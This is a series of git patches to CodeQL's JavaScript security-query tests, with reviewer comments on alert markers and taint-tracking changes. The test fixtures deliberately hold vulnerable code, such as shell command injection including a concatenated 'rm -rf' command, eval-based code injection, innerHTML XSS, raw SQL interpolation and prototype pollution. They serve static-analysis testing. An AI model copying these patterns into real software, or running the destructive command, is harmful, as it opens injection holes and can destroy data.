From: Asger F Date: Wed, 12 Feb 2025 14:12:04 +0100 Subject: [PATCH 058/892] JS: Accept some less obvious alerts These are listed in a function called 'good' but it's difficult to say in isolation whether they should be flagged or not. Accepting the changes as they seem reasonable. --- .../Security/CWE-116/IncompleteSanitization/tst.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index e18b45880bd3..8b7852f68535 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -126,18 +126,18 @@ function good11(s) { return s.replace("%d", "42"); } -function good12(s) { +function goodOrBad12(s) { s.replace('[', '').replace(']', ''); s.replace('(', '').replace(')', ''); s.replace('{', '').replace('}', ''); - s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer + s.replace('<', '').replace('>', ''); // $ Alert[js/incomplete-sanitization] - s.replace('[', '\\[').replace(']', '\\]'); - s.replace('{', '\\{').replace('}', '\\}'); + s.replace('[', '\\[').replace(']', '\\]'); // $ Alert[js/incomplete-sanitization] + s.replace('{', '\\{').replace('}', '\\}'); // $ Alert[js/incomplete-sanitization] s = s.replace('[', ''); s = s.replace(']', ''); - s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended + s.replace(/{/, '').replace(/}/, ''); // $ Alert[js/incomplete-sanitization] - should have used a string literal if a single replacement was intended s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged } From 68fae9ded8b84970c2a13f74a3bdcab368dedcdf Mon Sep 17 00:00:00 2001 
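Review bot: In `goodOrBad12` the rewritten line `s.replace('<', '').replace('>', ''); // $ Alert[js/incomplete-sanitization]` drops the old rationale "too common as a bad HTML sanitizer", and the two escaping lines below it gain a marker with no explanation at all. The commit message itself says these cases are hard to judge in isolation, so the reason belongs next to the expectation, as the last two annotated lines of the hunk already do: `// $ Alert[js/incomplete-sanitization] - too common as a bad HTML sanitizer`. For the `'\\['` and `'\\{'` lines, a short suffix such as `- a string pattern only escapes the first occurrence` (presumably the reason the query fires) would tell the next reader why the alert was accepted.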
From: Asger F Date: Wed, 12 Feb 2025 14:12:38 +0100 Subject: [PATCH 059/892] JS: Accept alerts about newline replacement --- .../Security/CWE-116/IncompleteSanitization/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index 8b7852f68535..ff90b5dcd234 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -145,8 +145,8 @@ function newlines(s) { // motivation for whitelist require("child_process").execSync("which emacs").toString().replace("\n", ""); - x.replace("\n", "").replace(x, y); - x.replace(x, y).replace("\n", ""); + x.replace("\n", "").replace(x, y); // $ Alert[js/incomplete-sanitization] + x.replace(x, y).replace("\n", ""); // $ Alert[js/incomplete-sanitization] } app.get('/some/path', function(req, res) { From e5bee19b1951c6866727f9a4bd3d289d62036411 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 14:16:07 +0100 Subject: [PATCH 060/892] JS: Accept a double-flagged line This is flagged by two queries but for two separate issues. Seems valid to flag it twice. --- .../query-tests/Security/CWE-116/IncompleteSanitization/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index ff90b5dcd234..d89b37f31d69 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js 
@@ -338,7 +338,7 @@ function typicalBadHtmlSanitizers(s) { } function bad18NewRegExp(p) { - return p.replace(new RegExp("\\.\\./"), ""); + return p.replace(new RegExp("\\.\\./"), ""); // $ Alert[js/incomplete-sanitization] Alert[js/incomplete-multi-character-sanitization] -- both lacking global flag, and multi-char replacement problem } function bad4NewRegExpG(s) { From e026b9e04893c06e448d49e86eb33f94aa7abd21 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:12:16 +0100 Subject: [PATCH 061/892] JS: Mark regressions due to lack of local field steps --- .../UnsafeShellCommandConstruction/lib/lib.js | 4 ++-- .../CWE-079/UnsafeHtmlConstruction/main.js | 2 +- .../CWE-094/CodeInjection/lib/index.js | 18 +++++++++--------- .../PrototypePollutingAssignment/lib.js | 2 +- 4 files changed, 13 insertions(+), 13 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 3a5f05fac77e..b6efdbd131a6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -363,8 +363,8 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // $ Alert - cp.exec(command); + var command = "learn " + this.learn_args + " " + model; // $ MISSING: Alert - lack of local field step + cp.exec(command); } }; module.exports.MyTrainer = MyTrainer; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 369643121368..061a82c862d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js 
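Review bot: The `MISSING: Alert` reasons added in this commit name the same cause four different ways: `lack of local field step` here in `train`, `needs localFieldStep` in UnsafeHtmlConstruction/main.js, `due to lack of localFieldStep` in CodeInjection/lib/index.js and `lacking local field step` in PrototypePollutingAssignment/lib.js. These are accepted false negatives on command-injection, XSS, code-injection and prototype-pollution sinks, so one search should find them all again. I would use a single phrase everywhere, e.g. `// $ MISSING: Alert - lack of local field step`, and put a tracking reference in the commit message, as PATCH 057 does. In this hunk `cp.exec(command);` is also removed and re-added with the same text, which looks like a whitespace-only change and is presumably unintended.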
@@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // $ Alert + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ MISSING: Alert - needs localFieldStep } } diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 950d34ff981f..600059382d9d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // $ Alert + eval(" var " + opts.varName + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { @@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert - eval(" var " + this.taint + " = something();"); // $ Alert + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } 
@@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert - eval(" var " + this.taint + " = something();"); // $ Alert + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index 6acf7ef2df10..79b34df3f7b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -67,7 +67,7 @@ class Foo { const obj = this.obj; const path = this.path; const value = this.value; - return (obj[path[0]][path[1]] = value); // $ Alert + return (obj[path[0]][path[1]] = value); // $ MISSING: Alert - lacking local field step } safe() { From 2c46e106787f570188d38046431321b1e6f9ff06 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:23:37 +0100 Subject: [PATCH 062/892] JS: Mark an alert as missing --- .../test/query-tests/Security/CWE-200/private-file-exposure.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js index c3aaec3926ff..ba532d6b42e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js @@ -61,7 +61,7 @@ function good() { app.use("bootstrap", express.static('./node_modules/bootstrap/dist')); } -app.use(express.static(__dirname)) // $ Alert +app.use(express.static(__dirname)) // $ MISSING: Alert const serveHandler = require("serve-handler"); const http = require("http"); From 426a871405c82a1edbf9d51fb5a0b70fb97c2cd7 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 15:11:58 +0100 Subject: [PATCH 063/892] JS: Remove incorrect Alert marker This is expected, based on a comment earlier in the file about the 'y' variable --- .../ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index 1e53a3a4a0f0..29eb66403511 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -3,6 +3,6 @@ /*global: z*/ // also not a proper global declaration w; x; -y; // $ Alert +y; z; // $ Alert var x, y, z; \ No newline at end of file From 287753187eadb95ca9047e4641ab33562f42f699 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 15:24:16 +0100 Subject: [PATCH 064/892] JS: Remove invalid syntax from test TS decorators may not appear on functions and enums --- .../UnusedVariable/UnusedVariable.expected | 2 -- .../Declarations/UnusedVariable/decorated.ts | 12 +++--------- 2 files changed, 3 insertions(+), 11 deletions(-) 
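Review bot: `app.use(express.static(__dirname)) // $ MISSING: Alert` gives no reason for the missing alert, and the commit message adds none. The identical call in subfolder/private-file-exposure-2.js was annotated `// $ Alert[js/exposure-of-private-files]` earlier in this series. Serving `__dirname` is exactly the exposure this query exists to catch, so a known false negative here should say why it is missed in this file but found in the other, or link an issue, in the same `- <reason>` form the other `MISSING` markers in the series use. Without that, the marker reads as an accepted regression that nobody is expected to follow up.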
diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected index 52ffe782fa2b..6b77c8021fbc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected @@ -1,7 +1,5 @@ #select | Babelrc/importPragma.jsx:2:1:2:27 | import ... react'; | Unused import q. | -| decorated.ts:1:1:1:126 | import ... where'; | Unused import actionHandler. | -| decorated.ts:4:10:4:12 | fun | Unused function fun. | | eval.js:10:9:10:24 | not_used_by_eval | Unused variable not_used_by_eval. | | eval.js:19:9:19:24 | not_used_by_eval | Unused variable not_used_by_eval. | | externs.js:5:5:5:13 | iAmUnused | Unused variable iAmUnused. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts index 858f69ffd5b1..39a06d5eb293 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts @@ -1,13 +1,7 @@ -import {actionHandler, actionHandlerFactory, actionHandlerFactoryProvider, actionHandlerFactoryProviderKind} from 'somewhere'; // OK - imports used as decorators - -@actionHandler -function fun() {} // OK - decorator might use the function +import { actionHandlerFactory, actionHandlerFactoryProvider } from 'somewhere'; // OK - imports used as decorators @actionHandlerFactory -class Class {} // OK - decorator might use the class +class Class { } // OK - decorator might use the class @actionHandlerFactoryProvider -export class ExportedClass {} // OK - decorator might use the class - -@actionHandlerFactoryProviderKind -enum Enum { plain } // OK - decorator might use the enum +export class ExportedClass { } // OK - decorator might use the class 
From a9b263f465d50279805ff6a8d5df7494ea0da543 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 16:01:58 +0100 Subject: [PATCH 065/892] JS: Remove incorrect alert expectation This is not flagged and AFAICT it shouldn't be --- .../Expressions/UnknownDirective/UnknownDirective.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index f958714431d6..e86b7b9d95bc 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js @@ -1,5 +1,5 @@ "use foo"; // $ Alert -"use strict"; // $ Alert +"use strict"; function bad() { "'use strict'"; // $ Alert From 22c218d66586d01b07a03b6934c26d4a9ee3b702 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 16:20:39 +0100 Subject: [PATCH 066/892] JS: Mark a 'good' test as 'bad' and add Alert marker The lack of whitespace around '&&' is problematic --- .../Expressions/WhitespaceContradictsPrecedence/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index a18728b19dc0..30b75270f946 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -38,8 +38,8 @@ function ok9(x, y, z) { return x * y*z; } -function ok10(o, p) { - return p in o&&o[p]; +function bad10(o, p) { + return p in o&&o[p]; // $ Alert } From b095fe2a19875508583ee2229e6ec72efd07c649 Mon Sep 17 00:00:00 2001 
From: Asger F Date: Wed, 12 Feb 2025 09:51:03 +0100 Subject: [PATCH 067/892] JS: Fix some bugs in a test case 'args' was a redeclared block-level variable, and 'myArgs' was not used when clearly intended to be used --- .../CWE-078/CommandInjection/child_process-test.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index d84fc28af7b3..ed1c9041a8ea 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -43,12 +43,12 @@ var server = http.createServer(function(req, res) { args[1] = cmd; cp.execFile("/bin/bash", args); // $ Alert - let args = []; + args = []; args[0] = "-c"; args[1] = cmd; run("sh", args); - let args = []; + args = []; args[0] = `-` + "c"; args[1] = cmd; cp.execFile(`/bin` + "/bash", args); // $ Alert @@ -56,10 +56,10 @@ var server = http.createServer(function(req, res) { cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert - let myArgs = []; + let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // $ MISSING: Alert - no support for `[].push()` for indirect arguments + cp.execFile(`/bin` + "/bash", myArgs); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); From c051b4c98d6b3af9ff084a66cc36f9d859ba2212 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:53:06 +0100 Subject: [PATCH 068/892] JS: Add spurious alert marker --- .../ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index 9ed6877e8663..2d82889d7f49 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -39,7 +39,7 @@ require('express')().get('/foo', (req, res) => { req.params.id, // $ Alert req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation - ] + ] // $ SPURIOUS: Alert - implicit reads causes flow here in addition to the individual array elements }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', From cf33db78ccdcd8e3d3daf1cb22e75bfbe353c23f Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:53:34 +0100 Subject: [PATCH 069/892] JS: Fix the spurious flow --- javascript/ql/lib/semmle/javascript/frameworks/SQL.qll | 5 ++++- .../test/query-tests/Security/CWE-089/untyped/pg-promise.js | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll index 218f2f8366e5..9d106251a211 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll 
@@ -221,7 +221,10 @@ private module Postgres { /** Gets a value that is plugged into a raw placeholder variable, making it a sink for SQL injection. */ private DataFlow::Node getARawValue() { - result = this.getValues() and this.getARawParameterName() = "1" // Special case: if the argument is not an array or object, it's just plugged into $1 + result = this.getValues() and + this.getARawParameterName() = "1" and // Special case: if the argument is not an array or object, it's just plugged into $1 + not result instanceof DataFlow::ArrayCreationNode and + not result instanceof DataFlow::ObjectLiteralNode or exists(DataFlow::SourceNode values | values = this.getValues().getALocalSource() | result = values.getAPropertyWrite(this.getARawParameterName()).getRhs() diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index 2d82889d7f49..9ed6877e8663 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -39,7 +39,7 @@ require('express')().get('/foo', (req, res) => { req.params.id, // $ Alert req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation - ] // $ SPURIOUS: Alert - implicit reads causes flow here in addition to the individual array elements + ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', From c593853710dae13f6d7faa8823fc9e2b2bea10fb Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:00:11 +0100 Subject: [PATCH 070/892] JS: Record some missing alerts in FileAccessToHttp --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index a354777e4921..f7e3a43a087e 100644 
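Review bot: The two added `not result instanceof ...` conjuncts in `getARawValue` only exclude an array or object literal written directly at the call site, because `result` is bound to `this.getValues()` itself. When the values are built first and passed through a variable, the argument node is a variable read rather than an `ArrayCreationNode`, so the whole-container flow this commit removes would presumably still be reported; the updated pg-promise.js test only covers the inline literal. The second disjunct already resolves the argument with `getALocalSource()`, and the same could be used here: `not result.getALocalSource() instanceof DataFlow::ArrayCreationNode and`, plus the matching `ObjectLiteralNode` line. The trailing `// Special case` comment now sits on the middle conjunct and would read better on its own line above the disjunct. The class enclosing this predicate starts and ends outside the hunk.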
--- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -11,7 +11,7 @@ function PostCode(codestring) { 'output_format': 'json', 'output_info': 'compiled_code', 'warning_level' : 'QUIET', - 'js_code' : codestring // $ Alert - passing data from file to the request json body + 'js_code' : codestring // $ MISSING: Alert - passing data from file to the request json body }); // An object of options to indicate where to post to @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ Alert - post the data from file to request body + post_req.write(post_data); // $ MISSING: Alert - post the data from file to request body post_req.end(); } From 319ee2ccd522682fb1441f8115957ce3b08098a2 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:20:44 +0100 Subject: [PATCH 071/892] JS: Track deep flow through qs.stringify --- .../javascript/frameworks/UriLibraries.qll | 19 +++++++++++++++++++ .../Security/CWE-200/googlecompiler.js | 4 ++-- 2 files changed, 21 insertions(+), 2 deletions(-) diff --git a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll index 0a262d154b2b..90dcc886ed43 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll 
@@ -421,3 +421,22 @@ private module ClosureLibraryUri { } } } + +private class QueryStringStringification extends DataFlow::SummarizedCallable { + QueryStringStringification() { this = "query-string stringification" } + + override DataFlow::InvokeNode getACall() { + result = + API::moduleImport(["querystring", "query-string", "querystringify", "qs"]) + .getMember("stringify") + .getACall() or + result = API::moduleImport("url-parse").getMember("qs").getMember("stringify").getACall() or + result = API::moduleImport("parseqs").getMember("encode").getACall() + } + + override predicate propagatesFlow(string input, string output, boolean preservesValue) { + preservesValue = false and + input = ["Argument[0]", "Argument[0].AnyMemberDeep"] and + output = "ReturnValue" + } +} diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index f7e3a43a087e..21f88a6d7eed 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ MISSING: Alert - post the data from file to request body + post_req.write(post_data); // $ Alert - post the data from file to request body post_req.end(); } @@ -58,4 +58,4 @@ fs.readFile('LinkedList.js', 'utf-8', function (err, data) { console.log("No data to post"); process.exit(-1); } -}); \ No newline at end of file +}); From e745f42291772beb1920eacd68a3b050284d6d5b Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 28 Feb 2025 13:18:41 +0100 Subject: [PATCH 072/892] JS: Remove alert expectation from step This is just a step on the path, not a sink --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
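Review bot: `QueryStringStringification` is added without a QLDoc comment, and the summary it defines applies to every taint-tracking query, not only the CWE-200 test updated in this commit. I would add `/** A taint step from the argument of a query-string serializer, and from any value nested inside it, to the returned string. */` above the class. Because `preservesValue = false` with `Argument[0].AnyMemberDeep` taints the result for all sinks, the other security query tests should be checked for newly reported flows through `stringify`/`encode` results; no such expectation changes are visible in this patch.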
diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index 21f88a6d7eed..b71ed168533f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -11,7 +11,7 @@ function PostCode(codestring) { 'output_format': 'json', 'output_info': 'compiled_code', 'warning_level' : 'QUIET', - 'js_code' : codestring // $ MISSING: Alert - passing data from file to the request json body + 'js_code' : codestring // passing data from file to the request json body }); // An object of options to indicate where to post to From d3de6d18a44f673bbe1af779a11955644ff1a1fa Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 28 Feb 2025 13:18:47 +0100 Subject: [PATCH 073/892] JS: Accept other changes to UnusedVariable --- .../Declarations/UnusedVariable/UnusedIndexVariable.js | 2 +- .../ql/test/query-tests/Declarations/UnusedVariable/eval.js | 4 ++-- .../query-tests/Declarations/UnusedVariable/multi-imports.js | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index 7d76d97b96bb..321a1df2f7b3 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++ Date: Tue, 11 Feb 2025 16:38:52 +0100 Subject: [PATCH 074/892] JS: Some more test changes in SpuriousArguments --- .../query-tests/LanguageFeatures/SpuriousArguments/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 046ca3aec677..387348232e3d 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -40,7 +40,7 @@ new String(1, 2, 3); // $ Alert h(function(x) { return x; }); })(function() {}); -parseFloat("123", 10); +parseFloat("123", 10); // $ Alert - unlike parseInt this does not take a radix (function testWhitelistEmptyFunctions(){ function nonEmpty(){ @@ -115,7 +115,7 @@ parseFloat("123", 10); throwerArrow(42); throwerCustom(42); throwerWithParam(42, 87); // $ Alert - throwerIndirect(42); // OK - but still flagged due to complexity + throwerIndirect(42); // $ SPURIOUS: Alert - flagged due to complexity }); function sum2() { From 576dbcb02053f0fb74238c56f2988a4a10439992 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:18:24 +0100 Subject: [PATCH 075/892] JS: Stop overriding entire module.exports object in test Doing `module.exports = blah` prevents other exports from being seen as library inputs. --- .../CWE-078/UnsafeShellCommandConstruction/lib/lib.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index b6efdbd131a6..77f49ad77017 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,6 +1,6 @@ var cp = require("child_process") -module.exports = function (name) { +module.exports.blah = function (name) { cp.exec("rm -rf " + name); // $ Alert cp.execFile(name, [name]); 
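Review bot: Replacing `module.exports = function (name)` with `module.exports.blah = ...` removes a case where the export itself is a function. The later hunks of lib.js do the same with `module.exports.cla = new cla()` and `module.exports.check`, which removes the class-instance case as well. If no other file in this test directory covers that export shape, the UnsafeShellCommandConstruction test no longer checks that parameters of a directly exported function are treated as library inputs. Keeping one such case in a small separate fixture would preserve that coverage. `blah` is also a placeholder; a name describing what the function does would make the fixture easier to read.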
